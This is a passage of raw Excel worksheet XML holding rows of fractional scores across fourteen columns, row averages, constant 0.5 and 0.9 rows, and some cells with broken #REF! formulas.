      <c r="A4" s="1" t="s">
        <v>1327</v>
      </c>
      <c r="B4" s="24">
        <v>1</v>
      </c>
      <c r="C4" s="24">
        <v>0.91</v>
      </c>
      <c r="D4" s="24">
        <v>0.9</v>
      </c>
      <c r="E4" s="24">
        <v>0.73</v>
      </c>
      <c r="F4" s="24">
        <v>0.52</v>
      </c>
      <c r="G4" s="24">
        <v>0.57999999999999996</v>
      </c>
      <c r="H4" s="24">
        <v>0.36</v>
      </c>
      <c r="I4" s="24">
        <v>0.54</v>
      </c>
      <c r="J4" s="24">
        <v>0.33</v>
      </c>
      <c r="K4" s="24">
        <v>0.64</v>
      </c>
      <c r="L4" s="24">
        <v>0.24</v>
      </c>
      <c r="M4" s="24">
        <v>0.33</v>
      </c>
      <c r="N4" s="24">
        <v>0.62</v>
      </c>
      <c r="O4" s="24">
        <v>0.36</v>
      </c>
      <c r="P4" s="24">
        <f>(SUM(B4:O4))/14</f>
        <v>0.57571428571428573</v>
      </c>
    </row>
    <row r="5" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A5" s="1" t="s">
        <v>1328</v>
      </c>
      <c r="B5" s="24">
        <v>1</v>
      </c>
      <c r="C5" s="24">
        <v>0.90773809523809534</v>
      </c>
      <c r="D5" s="24">
        <v>1</v>
      </c>
      <c r="E5" s="24">
        <v>0.75</v>
      </c>
      <c r="F5" s="24">
        <v>0.52261904761904765</v>
      </c>
      <c r="G5" s="24">
        <v>0.60255102040816322</v>
      </c>
      <c r="H5" s="24">
        <v>0.36382699987351153</v>
      </c>
      <c r="I5" s="24">
        <v>0.59523809523809534</v>
      </c>
      <c r="J5" s="24">
        <v>0.33333333333333337</v>
      </c>
      <c r="K5" s="24">
        <v>0.63888888888888884</v>
      </c>
      <c r="L5" s="24">
        <v>0.23529411764705882</v>
      </c>
      <c r="M5" s="24">
        <v>0.33333333333333331</v>
      </c>
      <c r="N5" s="24">
        <v>0.66666666666666663</v>
      </c>
      <c r="O5" s="24">
        <v>0.35714285714285715</v>
      </c>
      <c r="P5" s="24">
        <v>0.5933308896706464</v>
      </c>
    </row>
    <row r="6" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A6" s="1" t="s">
        <v>1329</v>
      </c>
      <c r="B6" s="24">
        <v>1</v>
      </c>
      <c r="C6" s="24">
        <v>0.90773809523809534</v>
      </c>
      <c r="D6" s="24">
        <v>1</v>
      </c>
      <c r="E6" s="24">
        <v>0.75</v>
      </c>
      <c r="F6" s="24">
        <v>0.542619047619048</v>
      </c>
      <c r="G6" s="24">
        <v>0.64255102040816303</v>
      </c>
      <c r="H6" s="24">
        <v>0.38382699987351199</v>
      </c>
      <c r="I6" s="24">
        <v>0.65523809523809495</v>
      </c>
      <c r="J6" s="24">
        <v>0.33333333333333298</v>
      </c>
      <c r="K6" s="24">
        <v>0.63888888888888884</v>
      </c>
      <c r="L6" s="24">
        <v>0.52529411764705902</v>
      </c>
      <c r="M6" s="24">
        <v>0.413333333333333</v>
      </c>
      <c r="N6" s="24">
        <v>0.66666666666666663</v>
      </c>
      <c r="O6" s="24">
        <v>0.42714285714285699</v>
      </c>
      <c r="P6" s="24">
        <v>0.63333088967064599</v>
      </c>
    </row>
    <row r="7" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A7" s="1" t="s">
        <v>1330</v>
      </c>
      <c r="B7" s="24">
        <v>1</v>
      </c>
      <c r="C7" s="24">
        <v>0.90773809523809534</v>
      </c>
      <c r="D7" s="24">
        <v>1</v>
      </c>
      <c r="E7" s="24">
        <v>0.75</v>
      </c>
      <c r="F7" s="24">
        <v>0.53556547619047623</v>
      </c>
      <c r="G7" s="24">
        <v>0.64068877551020409</v>
      </c>
      <c r="H7" s="24">
        <v>0.37797428669521688</v>
      </c>
      <c r="I7" s="24">
        <v>0.66141456582633062</v>
      </c>
      <c r="J7" s="24">
        <v>0.39583333333333337</v>
      </c>
      <c r="K7" s="24">
        <v>0.63888888888888884</v>
      </c>
      <c r="L7" s="24">
        <v>0.52941176470588236</v>
      </c>
      <c r="M7" s="24">
        <v>0.47058823529411759</v>
      </c>
      <c r="N7" s="24">
        <v>0.66666666666666663</v>
      </c>
      <c r="O7" s="24">
        <v>0.42857142857142855</v>
      </c>
      <c r="P7" s="24">
        <v>0.64309582263718856</v>
      </c>
    </row>
    <row r="8" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A8" s="1" t="s">
        <v>1331</v>
      </c>
      <c r="B8" s="24">
        <v>1</v>
      </c>
      <c r="C8" s="24">
        <v>0.90773809523809534</v>
      </c>
      <c r="D8" s="24">
        <v>1</v>
      </c>
      <c r="E8" s="24">
        <v>0.75</v>
      </c>
      <c r="F8" s="24">
        <v>0.53556547619047623</v>
      </c>
      <c r="G8" s="24">
        <v>0.64068877551020409</v>
      </c>
      <c r="H8" s="24">
        <v>0.37797428669521688</v>
      </c>
      <c r="I8" s="24">
        <v>0.66141456582633062</v>
      </c>
      <c r="J8" s="24">
        <v>0.40625</v>
      </c>
      <c r="K8" s="24">
        <v>0.63888888888888884</v>
      </c>
      <c r="L8" s="24">
        <v>0.52941176470588236</v>
      </c>
      <c r="M8" s="24">
        <v>0.47058823529411759</v>
      </c>
      <c r="N8" s="24">
        <v>0.66666666666666663</v>
      </c>
      <c r="O8" s="24">
        <v>0.42857142857142855</v>
      </c>
      <c r="P8" s="24">
        <v>0.64383987025623612</v>
      </c>
    </row>
    <row r="9" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A9" s="1" t="s">
        <v>1332</v>
      </c>
      <c r="B9" s="33">
        <v>1</v>
      </c>
      <c r="C9" s="33">
        <v>0.91</v>
      </c>
      <c r="D9" s="33">
        <v>1</v>
      </c>
      <c r="E9" s="33">
        <v>0.75</v>
      </c>
      <c r="F9" s="33">
        <v>0.54</v>
      </c>
      <c r="G9" s="33">
        <v>0.64</v>
      </c>
      <c r="H9" s="33">
        <v>0.38</v>
      </c>
      <c r="I9" s="33">
        <v>0.66</v>
      </c>
      <c r="J9" s="33">
        <v>0.47</v>
      </c>
      <c r="K9" s="33">
        <v>0.64</v>
      </c>
      <c r="L9" s="33">
        <v>0.53</v>
      </c>
      <c r="M9" s="33">
        <v>0.47</v>
      </c>
      <c r="N9" s="33">
        <v>0.67</v>
      </c>
      <c r="O9" s="33">
        <v>0.43</v>
      </c>
      <c r="P9" s="33">
        <v>0.65</v>
      </c>
    </row>
    <row r="10" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A10" s="1" t="s">
        <v>1333</v>
      </c>
      <c r="B10" s="33">
        <v>1</v>
      </c>
      <c r="C10" s="33">
        <v>0.90773809523809534</v>
      </c>
      <c r="D10" s="33">
        <v>1</v>
      </c>
      <c r="E10" s="33">
        <v>0.75</v>
      </c>
      <c r="F10" s="33">
        <v>0.53556547619047623</v>
      </c>
      <c r="G10" s="33">
        <v>0.64068877551020409</v>
      </c>
      <c r="H10" s="33">
        <v>0.44038732585244217</v>
      </c>
      <c r="I10" s="33">
        <v>0.66141456582633062</v>
      </c>
      <c r="J10" s="33">
        <v>0.5</v>
      </c>
      <c r="K10" s="33">
        <v>0.63888888888888884</v>
      </c>
      <c r="L10" s="33">
        <v>0.52941176470588236</v>
      </c>
      <c r="M10" s="33">
        <v>0.47058823529411759</v>
      </c>
      <c r="N10" s="33">
        <v>0.66666666666666663</v>
      </c>
      <c r="O10" s="33">
        <v>0.42857142857142855</v>
      </c>
      <c r="P10" s="33">
        <v>0.65499437305318087</v>
      </c>
    </row>
    <row r="11" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A11" s="1" t="s">
        <v>1334</v>
      </c>
      <c r="B11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="C11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="D11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="E11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="F11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="G11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="H11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="I11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="J11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="K11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="L11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="M11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="N11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="O11" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="P11" s="24" t="e">
        <f>(SUM(B11:O11))/14</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="12" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B12" s="24"/>
      <c r="C12" s="24"/>
      <c r="D12" s="24"/>
      <c r="E12" s="24"/>
      <c r="F12" s="24"/>
      <c r="G12" s="24"/>
      <c r="H12" s="24"/>
      <c r="I12" s="24"/>
      <c r="J12" s="24"/>
      <c r="K12" s="24"/>
      <c r="L12" s="24"/>
      <c r="M12" s="24"/>
      <c r="N12" s="24"/>
      <c r="O12" s="24"/>
    </row>
    <row r="13" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B13" s="24"/>
      <c r="C13" s="24"/>
      <c r="D13" s="24"/>
      <c r="E13" s="24"/>
      <c r="F13" s="24"/>
      <c r="G13" s="24"/>
      <c r="H13" s="24"/>
      <c r="I13" s="24"/>
      <c r="J13" s="24"/>
      <c r="K13" s="24"/>
      <c r="L13" s="24"/>
      <c r="M13" s="24"/>
      <c r="N13" s="24"/>
      <c r="O13" s="24"/>
    </row>
    <row r="14" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B14" s="24"/>
      <c r="C14" s="24"/>
      <c r="D14" s="24"/>
      <c r="E14" s="24"/>
      <c r="F14" s="24"/>
      <c r="G14" s="24"/>
      <c r="H14" s="24"/>
      <c r="I14" s="24"/>
      <c r="J14" s="24"/>
      <c r="K14" s="24"/>
      <c r="L14" s="24"/>
      <c r="M14" s="24"/>
      <c r="N14" s="24"/>
      <c r="O14" s="24"/>
    </row>
    <row r="15" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B15" s="24"/>
      <c r="C15" s="24"/>
      <c r="D15" s="24"/>
      <c r="E15" s="24"/>
      <c r="F15" s="24"/>
      <c r="G15" s="24"/>
      <c r="H15" s="24"/>
      <c r="I15" s="24"/>
      <c r="J15" s="24"/>
      <c r="K15" s="24"/>
      <c r="L15" s="24"/>
      <c r="M15" s="24"/>
      <c r="N15" s="24"/>
      <c r="O15" s="24"/>
    </row>
    <row r="16" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B16" s="24"/>
      <c r="C16" s="24"/>
      <c r="D16" s="24"/>
      <c r="E16" s="24"/>
      <c r="F16" s="24"/>
      <c r="G16" s="24"/>
      <c r="H16" s="24"/>
      <c r="I16" s="24"/>
      <c r="J16" s="24"/>
      <c r="K16" s="24"/>
      <c r="L16" s="24"/>
      <c r="M16" s="24"/>
      <c r="N16" s="24"/>
      <c r="O16" s="24"/>
    </row>
    <row r="17" spans="2:17" x14ac:dyDescent="0.25">
      <c r="B17" s="24"/>
      <c r="C17" s="24"/>
      <c r="D17" s="24"/>
      <c r="E17" s="24"/>
      <c r="F17" s="24"/>
      <c r="G17" s="24"/>
      <c r="H17" s="24"/>
      <c r="I17" s="24"/>
      <c r="J17" s="24"/>
      <c r="K17" s="24"/>
      <c r="L17" s="24"/>
      <c r="M17" s="24"/>
      <c r="N17" s="24"/>
      <c r="O17" s="24"/>
    </row>
    <row r="18" spans="2:17" x14ac:dyDescent="0.25">
      <c r="B18" s="24"/>
      <c r="C18" s="24"/>
      <c r="D18" s="24"/>
      <c r="E18" s="24"/>
      <c r="F18" s="24"/>
      <c r="G18" s="24"/>
      <c r="H18" s="24"/>
      <c r="I18" s="24"/>
      <c r="J18" s="24"/>
      <c r="K18" s="24"/>
      <c r="L18" s="24"/>
      <c r="M18" s="24"/>
      <c r="N18" s="24"/>
      <c r="O18" s="24"/>
    </row>
    <row r="19" spans="2:17" x14ac:dyDescent="0.25">
      <c r="B19" s="24"/>
      <c r="C19" s="24"/>
      <c r="D19" s="24"/>
      <c r="E19" s="24"/>
      <c r="F19" s="24"/>
      <c r="G19" s="24"/>
      <c r="H19" s="24"/>
      <c r="I19" s="24"/>
      <c r="J19" s="24"/>
      <c r="K19" s="24"/>
      <c r="L19" s="24"/>
      <c r="M19" s="24"/>
      <c r="N19" s="24"/>
      <c r="O19" s="24"/>
    </row>
    <row r="20" spans="2:17" x14ac:dyDescent="0.25">
      <c r="B20" s="24"/>
      <c r="C20" s="24"/>
      <c r="D20" s="24"/>
      <c r="E20" s="24"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="24"/>
      <c r="I20" s="24"/>
      <c r="J20" s="24"/>
      <c r="K20" s="24"/>
      <c r="L20" s="24"/>
      <c r="M20" s="24"/>
      <c r="N20" s="24"/>
      <c r="O20" s="24"/>
    </row>
    <row r="21" spans="2:17" x14ac:dyDescent="0.25">
      <c r="B21" s="24"/>
      <c r="C21" s="24"/>
      <c r="D21" s="24"/>
      <c r="E21" s="24"/>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="24"/>
      <c r="I21" s="24"/>
      <c r="J21" s="24"/>
      <c r="K21" s="24"/>
      <c r="L21" s="24"/>
      <c r="M21" s="24"/>
      <c r="N21" s="24"/>
      <c r="O21" s="24"/>
    </row>
    <row r="22" spans="2:17" x14ac:dyDescent="0.25">
      <c r="B22" s="24"/>
      <c r="C22" s="24"/>
      <c r="D22" s="24"/>
      <c r="E22" s="24"/>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="24"/>
      <c r="I22" s="24"/>
      <c r="J22" s="24"/>
      <c r="K22" s="24"/>
      <c r="L22" s="24"/>
      <c r="M22" s="24"/>
      <c r="N22" s="24"/>
      <c r="O22" s="24"/>
    </row>
    <row r="23" spans="2:17" x14ac:dyDescent="0.25">
      <c r="B23" s="24"/>
      <c r="C23" s="24"/>
      <c r="D23" s="24"/>
      <c r="E23" s="24"/>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="24"/>
      <c r="I23" s="24"/>
      <c r="J23" s="24"/>
      <c r="K23" s="24"/>
      <c r="L23" s="24"/>
      <c r="M23" s="24"/>
      <c r="N23" s="24"/>
      <c r="O23" s="24"/>
    </row>
    <row r="26" spans="2:17" x14ac:dyDescent="0.25">
      <c r="B26" s="24"/>
      <c r="C26" s="24"/>
      <c r="D26" s="24"/>
      <c r="E26" s="24"/>
      <c r="F26" s="24"/>
      <c r="G26" s="24"/>
      <c r="H26" s="24"/>
      <c r="I26" s="24"/>
      <c r="J26" s="24"/>
      <c r="K26" s="24"/>
      <c r="L26" s="24"/>
      <c r="M26" s="24"/>
      <c r="N26" s="24"/>
      <c r="O26" s="24"/>
    </row>
    <row r="27" spans="2:17" x14ac:dyDescent="0.25">
      <c r="B27" s="24"/>
      <c r="C27" s="24"/>
      <c r="D27" s="24"/>
      <c r="E27" s="24"/>
      <c r="F27" s="24"/>
      <c r="G27" s="24"/>
      <c r="H27" s="24"/>
      <c r="I27" s="24"/>
      <c r="J27" s="24"/>
      <c r="K27" s="24"/>
      <c r="L27" s="24"/>
      <c r="M27" s="24"/>
      <c r="N27" s="24"/>
      <c r="O27" s="24"/>
    </row>
    <row r="28" spans="2:17" x14ac:dyDescent="0.25">
      <c r="B28" s="24"/>
      <c r="C28" s="24"/>
      <c r="D28" s="24"/>
      <c r="E28" s="24"/>
      <c r="F28" s="24"/>
      <c r="G28" s="24"/>
      <c r="H28" s="24"/>
      <c r="I28" s="24"/>
      <c r="J28" s="24"/>
      <c r="K28" s="24"/>
      <c r="L28" s="24"/>
      <c r="M28" s="24"/>
      <c r="N28" s="24"/>
      <c r="O28" s="24"/>
      <c r="P28" s="24"/>
      <c r="Q28" s="2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93266-08AA-48DB-AECC-13CA435A5D1D}">
  <dimension ref="A1:O24"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C94" sqref="C94"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="18.140625" bestFit="1" customWidth="1"/>
    <col min="2" max="15" width="13.28515625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A1" s="1" t="s">
        <v>1335</v>
      </c>
      <c r="B1" s="25" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="25" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="25" t="s">
        <v>3</v>
      </c>
      <c r="F1" s="25" t="s">
        <v>4</v>
      </c>
      <c r="G1" s="25" t="s">
        <v>5</v>
      </c>
      <c r="H1" s="25" t="s">
        <v>6</v>
      </c>
      <c r="I1" s="25" t="s">
        <v>7</v>
      </c>
      <c r="J1" s="25" t="s">
        <v>8</v>
      </c>
      <c r="K1" s="25" t="s">
        <v>9</v>
      </c>
      <c r="L1" s="25" t="s">
        <v>10</v>
      </c>
      <c r="M1" s="25" t="s">
        <v>11</v>
      </c>
      <c r="N1" s="25" t="s">
        <v>12</v>
      </c>
      <c r="O1" s="25" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A2" s="29" t="s">
        <v>1336</v>
      </c>
      <c r="B2" s="24">
        <v>0.5</v>
      </c>
      <c r="C2" s="24">
        <v>0.5</v>
      </c>
      <c r="D2" s="24">
        <v>0.5</v>
      </c>
      <c r="E2" s="24">
        <v>0.5</v>
      </c>
      <c r="F2" s="24">
        <v>0.5</v>
      </c>
      <c r="G2" s="24">
        <v>0.5</v>
      </c>
      <c r="H2" s="24">
        <v>0.5</v>
      </c>
      <c r="I2" s="24">
        <v>0.5</v>
      </c>
      <c r="J2" s="24">
        <v>0.5</v>
      </c>
      <c r="K2" s="24">
        <v>0.5</v>
      </c>
      <c r="L2" s="24">
        <v>0.5</v>
      </c>
      <c r="M2" s="24">
        <v>0.5</v>
      </c>
      <c r="N2" s="24">
        <v>0.5</v>
      </c>
      <c r="O2" s="24">
        <v>0.5</v>
      </c>
    </row>
    <row r="3" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A3" s="28" t="s">
        <v>1337</v>
      </c>
      <c r="B3" s="24">
        <v>0.9</v>
      </c>
      <c r="C3" s="24">
        <v>0.9</v>
      </c>
      <c r="D3" s="24">
        <v>0.9</v>
      </c>
      <c r="E3" s="24">
        <v>0.9</v>
      </c>
      <c r="F3" s="24">
        <v>0.9</v>
      </c>
      <c r="G3" s="24">
        <v>0.9</v>
      </c>
      <c r="H3" s="24">
        <v>0.9</v>
      </c>
      <c r="I3" s="24">
        <v>0.9</v>
      </c>
      <c r="J3" s="24">
        <v>0.9</v>
      </c>
      <c r="K3" s="24">
        <v>0.9</v>
      </c>
      <c r="L3" s="24">
        <v>0.9</v>
      </c>
      <c r="M3" s="24">
        <v>0.9</v>
      </c>
      <c r="N3" s="24">
        <v>0.9</v>
      </c>
      <c r="O3" s="24">
        <v>0.9</v>
      </c>
    </row>
    <row r="4" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A4" s="30" t="s">
        <v>1338</v>
      </c>
      <c r="B4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="C4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="D4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="E4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="F4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="G4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="H4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="I4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="J4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="K4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="L4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="M4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="N4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="O4" s="24" t="e">
        <f>(#REF!)</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="5" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B5" s="24"/>
      <c r="C5" s="24"/>
      <c r="D5" s="24"/>
      <c r="E5" s="24"/>
      <c r="F5" s="24"/>
      <c r="G5" s="24"/>
      <c r="H5" s="24"/>
      <c r="I5" s="24"/>
      <c r="J5" s="24"/>
      <c r="K5" s="24"/>
      <c r="L5" s="24"/>
      <c r="M5" s="24"/>
      <c r="N5" s="24"/>
      <c r="O5" s="24"/>
    </row>
    <row r="6" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B6" s="24"/>
      <c r="C6" s="24"/>
      <c r="D6" s="24"/>
      <c r="E6" s="24"/>
      <c r="F6" s="24"/>
      <c r="G6" s="24"/>
      <c r="H6" s="24"/>
      <c r="I6" s="24"/>
      <c r="J6" s="24"/>
      <c r="K6" s="24"/>
      <c r="L6" s="24"/>
      <c r="M6" s="24"/>
      <c r="N6" s="24"/>
      <c r="O6" s="24"/>
    </row>
    <row r="7" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B7" s="24"/>
      <c r="C7" s="24"/>
      <c r="D7" s="24"/>
      <c r="E7" s="24"/>
      <c r="F7" s="24"/>
      <c r="G7" s="24"/>
      <c r="H7" s="24"/>
      <c r="I7" s="24"/>
      <c r="J7" s="24"/>
      <c r="K7" s="24"/>
      <c r="L7" s="24"/>
      <c r="M7" s="24"/>
      <c r="N7" s="24"/>
      <c r="O7" s="24"/>
    </row>
    <row r="8" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B8" s="24"/>
      <c r="C8" s="24"/>
      <c r="D8" s="24"/>
      <c r="E8" s="24"/>
      <c r="F8" s="24"/>
      <c r="G8" s="24"/>
      <c r="H8" s="24"/>
      <c r="I8" s="24"/>
      <c r="J8" s="24"/>
      <c r="K8" s="24"/>
      <c r="L8" s="24"/>
      <c r="M8" s="24"/>
      <c r="N8" s="24"/>
      <c r="O8" s="24"/>
    </row>
    <row r="9" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B9" s="24"/>
      <c r="C9" s="24"/>
      <c r="D9" s="24"/>
      <c r="E9" s="24"/>
      <c r="F9" s="24"/>
      <c r="G9" s="24"/>
      <c r="H9" s="24"/>
      <c r="I9" s="24"/>
      <c r="J9" s="24"/>
      <c r="K9" s="24"/>
      <c r="L9" s="24"/>
      <c r="M9" s="24"/>
      <c r="N9" s="24"/>
      <c r="O9" s="24"/>
    </row>
    <row r="10" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B10" s="24"/>
      <c r="C10" s="24"/>
      <c r="D10" s="24"/>
      <c r="E10" s="24"/>
      <c r="F10" s="24"/>
      <c r="G10" s="24"/>
      <c r="H10" s="24"/>
      <c r="I10" s="24"/>
      <c r="J10" s="24"/>
      <c r="K10" s="24"/>
      <c r="L10" s="24"/>
      <c r="M10" s="24"/>
      <c r="N10" s="24"/>
      <c r="O10" s="24"/>
    </row>
    <row r="11" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B11" s="24"/>
      <c r="C11" s="24"/>
      <c r="D11" s="24"/>
      <c r="E11" s="24"/>
      <c r="F11" s="24"/>
      <c r="G11" s="24"/>
      <c r="H11" s="24"/>
      <c r="I11" s="24"/>
      <c r="J11" s="24"/>
      <c r="K11" s="24"/>
      <c r="L11" s="24"/>
      <c r="M11" s="24"/>
      <c r="N11" s="24"/>
      <c r="O11" s="24"/>
    </row>
    <row r="12" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B12" s="24"/>
      <c r="C12" s="24"/>
      <c r="D12" s="24"/>
      <c r="E12" s="24"/>
      <c r="F12" s="24"/>
      <c r="G12" s="24"/>
      <c r="H12" s="24"/>
      <c r="I12" s="24"/>
      <c r="J12" s="24"/>
      <c r="K12" s="24"/>
      <c r="L12" s="24"/>
      <c r="M12" s="24"/>
      <c r="N12" s="24"/>
      <c r="O12" s="24"/>
    </row>
    <row r="13" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B13" s="24"/>
      <c r="C13" s="24"/>
      <c r="D13" s="24"/>
      <c r="E13" s="24"/>
      <c r="F13" s="24"/>
      <c r="G13" s="24"/>
      <c r="H13" s="24"/>
      <c r="I13" s="24"/>
      <c r="J13" s="24"/>
      <c r="K13" s="24"/>
      <c r="L13" s="24"/>
      <c r="M13" s="24"/>
      <c r="N13" s="24"/>
      <c r="O13" s="24"/>
    </row>
    <row r="14" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B14" s="24"/>
      <c r="C14" s="24"/>
      <c r="D14" s="24"/>
      <c r="E14" s="24"/>
      <c r="F14" s="24"/>
      <c r="G14" s="24"/>
      <c r="H14" s="24"/>
      <c r="I14" s="24"/>
      <c r="J14" s="24"/>
      <c r="K14" s="24"/>
      <c r="L14" s="24"/>
      <c r="M14" s="24"/>
      <c r="N14" s="24"/>
      <c r="O14" s="24"/>
    </row>
    <row r="15" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B15" s="24"/>
      <c r="C15" s="24"/>
      <c r="D15" s="24"/>
      <c r="E15" s="24"/>
      <c r="F15" s="24"/>
      <c r="G15" s="24"/>
      <c r="H15" s="24"/>
      <c r="I15" s="24"/>
      <c r="J15" s="24"/>
      <c r="K15" s="24"/>
      <c r="L15" s="24"/>
      <c r="M15" s="24"/>
      <c r="N15" s="24"/>
      <c r="O15" s="24"/>
    </row>
    <row r="16" spans="1:15" x14ac:dyDescent="0.25">
      <c r="B16" s="24"/>
      <c r="C16" s="24"/>
      <c r="D16" s="24"/>
      <c r="E16" s="24"/>
      <c r="F16" s="24"/>
      <c r="G16" s="24"/>
      <c r="H16" s="24"/>
      <c r="I16" s="24"/>
      <c r="J16" s="24"/>
      <c r="K16" s="24"/>
      <c r="L16" s="24"/>
      <c r="M16" s="24"/>
      <c r="N16" s="24"/>
      <c r="O16" s="24"/>
    </row>
    <row r="17" spans="2:15" x14ac:dyDescent="0.25">
      <c r="B17" s="24"/>
      <c r="C17" s="24"/>
      <c r="D17" s="24"/>
      <c r="E17" s="24"/>
      <c r="F17" s="24"/>
      <c r="G17" s="24"/>
      <c r="H17" s="24"/>
      <c r="I17" s="24"/>
      <c r="J17" s="24"/>
      <c r="K17" s="24"/>
      <c r="L17" s="24"/>
      <c r="M17" s="24"/>
      <c r="N17" s="24"/>
      <c r="O17" s="24"/>
    </row>
    <row r="18" spans="2:15" x14ac:dyDescent="0.25">
      <c r="B18" s="24"/>
      <c r="C18" s="24"/>
      <c r="D18" s="24"/>
      <c r="E18" s="24"/>
      <c r="F18" s="24"/>
      <c r="G18" s="24"/>
      <c r="H18" s="24"/>
      <c r="I18" s="24"/>
      <c r="J18" s="24"/>
      <c r="K18" s="24"/>
      <c r="L18" s="24"/>
      <c r="M18" s="24"/>
      <c r="N18" s="24"/>
      <c r="O18" s="24"/>
    </row>
    <row r="19" spans="2:15" x14ac:dyDescent="0.25">
      <c r="B19" s="24"/>
      <c r="C19" s="24"/>
      <c r="D19" s="24"/>
      <c r="E19" s="24"/>
      <c r="F19" s="24"/>
      <c r="G19" s="24"/>
      <c r="H19" s="24"/>
      <c r="I19" s="24"/>
      <c r="J19" s="24"/>
      <c r="K19" s="24"/>
      <c r="L19" s="24"/>
      <c r="M19" s="24"/>
      <c r="N19" s="24"/>
      <c r="O19" s="24"/>
    </row>
    <row r="20" spans="2:15" x14ac:dyDescent="0.25">
      <c r="B20" s="24"/>
      <c r="C20" s="24"/>
      <c r="D20" s="24"/>
      <c r="E20" s="24"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="24"/>
      <c r="I20" s="24"/>
      <c r="J20" s="24"/>
      <c r="K20" s="24"/>
      <c r="L20" s="24"/>
      <c r="M20" s="24"/>
      <c r="N20" s="24"/>
      <c r="O20" s="24"/>
    </row>
    <row r="22" spans="2:15" x14ac:dyDescent="0.25">
      <c r="B22" s="24"/>
      <c r="C22" s="24"/>
      <c r="D22" s="24"/>
      <c r="E22" s="24"/>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="24"/>
      <c r="I22" s="24"/>
      <c r="J22" s="24"/>
      <c r="K22" s="24"/>
      <c r="L22" s="24"/>
      <c r="M22" s="24"/>
      <c r="N22" s="24"/>
      <c r="O22" s="24"/>
    </row>
    <row r="23" spans="2:15" x14ac:dyDescent="0.25">
      <c r="B23" s="24"/>
      <c r="C23" s="24"/>
      <c r="D23" s="24"/>
      <c r="E23" s="24"/>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="24"/>
